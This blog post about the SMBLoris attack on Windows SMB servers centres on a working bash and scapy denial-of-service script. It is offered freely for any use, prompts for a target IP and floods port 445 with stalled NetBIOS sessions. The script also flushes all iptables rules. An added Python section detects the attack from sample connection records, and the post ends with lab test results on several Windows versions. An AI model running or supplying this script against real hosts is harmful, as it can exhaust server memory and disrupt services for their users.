Last weekend some interesting news came out of DEFCON 25 about a new SMB denial-of-service attack, technically similar to the notorious Slowloris attack against Apache.
Please refer to the following page for more information about SMBLoris: https://smbloris.com/
There is also a demonstration by Sam Bowne on YouTube: https://www.youtube.com/watch?v=Y77er0gzQqA
I have transferred his demonstration from the video into a single script to play around with; save it however you wish.
```bash
#!/bin/bash
clear
echo "***************************************************************"
echo " MS Windows SMB Remote DOS - need access to TCP 445 "
echo " Thx to Sam Bowne & DEFCON 25 "
echo "***************************************************************"

echo "[*] Checking if python-scapy module is installed "
if ! python -c "import scapy" 2>/dev/null; then
    echo "[-] Scapy not found please run apt-get install python-scapy"
    exit 1
fi
echo "[*] Scapy found "

# The SYNs go out through a raw socket, so the local kernel has no socket for them and
# would answer every SYN/ACK with a RST, tearing the session down before the server
# processes the NetBIOS header. Drop outgoing RSTs while the attack runs.
# NOTE: "iptables -F" wipes every existing rule in the filter table; when done, remove
# the RST rule again with:  iptables -D OUTPUT -p tcp --tcp-flags RST RST -j DROP
echo "[*] Setting iptables to stop RST packets "
iptables -F
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

echo -e "Remote Windows SMB host IP ? \c"
read ip
# "threads" is really the number of source ports each python process walks through,
# starting at the offset it is given below. TCP source ports are 16-bit, so an
# offset+threads above 65535 makes scapy fail to build the packet.
echo -e "How many threads are we gonna use ? [90000 is good] : \c"
read threads

# Generate the scapy script. The heredoc is unquoted so ${ip} and ${threads} are
# substituted; the \x escapes are left alone by bash and interpreted by python.
cat > smb-dos.py <<EOF
from scapy.all import *
import sys

p0 = int(sys.argv[1])

# send at layer 3 through a raw socket
conf.L3socket = L3RawSocket

i = IP()
i.dst = "${ip}"
t = TCP()
t.dport = 445

for p in range(p0, p0 + ${threads}):
    print(p)
    t.sport = p
    t.flags = "S"

    # complete the handshake by hand: SYN, wait for the SYN/ACK, then ACK
    r = sr1(i/t, timeout=2)
    if r is None or not r.haslayer(TCP):
        # no SYN/ACK (filtered port, or an ICMP error came back): skip this port
        continue
    rt = r[TCP]
    t.ack = rt.seq + 1
    t.seq = rt.ack
    t.flags = "A"

    # NetBIOS session header: type 0x00 (session message), 17-bit length 0x1FFFF,
    # i.e. "131071 bytes follow" - and then nothing ever follows
    sbss = '\x00\x01\xff\xff'
    send(i/t/sbss)
EOF

ls -la smb-dos.py
echo "[*] Running SMB DOS against $ip"
sleep 2
# ten processes, each starting 1000 source ports further along
for p0 in 0 1000 2000 3000 4000 5000 6000 7000 8000 9000; do
    python smb-dos.py $p0 &
done
```
The script is pretty self-explanatory: it drops outgoing RSTs so the local kernel does not tear down the raw-socket connections, completes a handshake on each source port, and then sends a single 4-byte NetBIOS session header announcing a 0x1FFFF-byte message that never arrives, leaving the server holding the buffer for each half-used session. Feel free to do whatever you want with it.
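As an added example (not part of the original post or of Sam Bowne's demo), here is a small Python 3 script that encodes and decodes the 4-byte NetBIOS session header the attack sends, which shows why `\x00\x01\xff\xff` announces a 131071-byte message, and then runs a simple detection over a constructed set of per-connection records to flag a client that holds many sessions which announced a large message and delivered none of it. The record layout, the IP addresses and the thresholds are assumptions for illustration; that the server reserves a buffer of the announced size per session is the mechanism described on smbloris.com, not something this script measures.

```python
import struct
from collections import defaultdict

# NetBIOS Session Service header (RFC 1002) as carried over TCP/445:
#   byte 0   message type (0x00 = session message)
#   byte 1   flags; bit 0 is the 17th (high) bit of the length
#   bytes 2-3 low 16 bits of the length
NBSS_SESSION_MESSAGE = 0x00
NBSS_MAX_LENGTH = 0x1FFFF  # 131071 bytes, the largest value a 17-bit length can carry


def build_nbss_header(length, msg_type=NBSS_SESSION_MESSAGE):
    """Encode a 4-byte NBSS header announcing `length` bytes of payload."""
    if not 0 <= length <= NBSS_MAX_LENGTH:
        raise ValueError("NBSS length must fit in 17 bits")
    flags = (length >> 16) & 0x01
    return struct.pack(">BBH", msg_type, flags, length & 0xFFFF)


def parse_nbss_header(data):
    """Decode the first four bytes of a session; returns (msg_type, announced_length)."""
    if len(data) < 4:
        raise ValueError("need at least 4 bytes for an NBSS header")
    msg_type, flags, low = struct.unpack(">BBH", data[:4])
    return msg_type, ((flags & 0x01) << 16) | low


# Constructed sample of per-connection records, the sort of thing a sensor or a
# netstat/pcap reduction would give you (hypothetical layout):
#   (client_ip, src_port, first_bytes_sent, payload_bytes_received_after_header)
# The 10.0.0.5 rows mimic the attack script: a header announcing 0x1FFFF bytes from
# many source ports, followed by nothing at all.
SAMPLE_CONNECTIONS = [
    ("10.0.0.5", 1000, b"\x00\x01\xff\xff", 0),
    ("10.0.0.5", 1001, b"\x00\x01\xff\xff", 0),
    ("10.0.0.5", 1002, b"\x00\x01\xff\xff", 0),
    ("10.0.0.5", 1003, b"\x00\x01\xff\xff", 0),
    # a normal client: small request, fully delivered
    ("10.0.0.9", 49152, b"\x00\x00\x00\x54" + b"\xffSMB" + b"\x00" * 80, 84),
    # a client that announced a large transfer but actually sent it
    ("10.0.0.9", 49153, b"\x00\x01\x00\x00" + b"\xffSMB", 65536),
]


def find_smbloris_candidates(connections, min_announced=0x10000, min_sessions=3):
    """Flag client IPs with at least `min_sessions` sessions that announced a message of
    `min_announced` bytes or more and then delivered nothing.
    Returns {ip: (stalled_sessions, total_bytes_announced)}."""
    stalled = defaultdict(lambda: [0, 0])
    for ip, _sport, first_bytes, received in connections:
        try:
            msg_type, announced = parse_nbss_header(first_bytes)
        except ValueError:
            continue  # not enough bytes to be an NBSS header
        if msg_type != NBSS_SESSION_MESSAGE:
            continue
        if announced >= min_announced and received == 0:
            stalled[ip][0] += 1
            stalled[ip][1] += announced
    return {ip: (n, total) for ip, (n, total) in stalled.items() if n >= min_sessions}


if __name__ == "__main__":
    assert build_nbss_header(NBSS_MAX_LENGTH) == b"\x00\x01\xff\xff"
    for ip, (n, total) in sorted(find_smbloris_candidates(SAMPLE_CONNECTIONS).items()):
        print("%s: %d stalled sessions, %d bytes announced but never sent" % (ip, n, total))
```

The "received == 0" condition is what separates SMBLoris from a legitimate large transfer: a real client that announces 64 KiB goes on to send it, while the attack script announces the 17-bit maximum on every port and goes silent. Per-source thresholds like `min_sessions` are a starting point only; the attack scales with source ports and hosts, so a per-server count of stalled sessions is the number to watch.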
Here are my test results and videos for each of the Windows platforms I have run this script against. I was using VirtualBox on Linux with internal networking. Bear in mind that you need access to TCP 445 on the remote host for this to work, so check your firewalls ;)
Windows Server 2016 – latest patches installed
- Memory was slowly being eaten, but after a while it gets released and starts to grow again. This could have an impact if more hosts were sending this attack simultaneously.
- Below you can see the video of the test performed.
Windows 10 x64 – latest patches installed
- Same behaviour observed as with Windows Server 2016, as expected.
- Below you can see the video of the test performed.
Windows 7 SP1 x64 – latest patches installed
- Here the system was brought to its knees at one point; if I had run this attack from one more virtual machine, the box would have had a hard time.
- Below you can see the video of the test performed.
Windows Server 2003 R2 x64 – whatever patches were available back then
- Actually pretty stable during the attack :)
- Below you can see the video of the test performed.
That's it!
P.S. I have tried it against Samba on Linux … no problem so far, but I would not be so sure; this has potential for abuse. The same goes for NFS/RPC … let's see what time brings.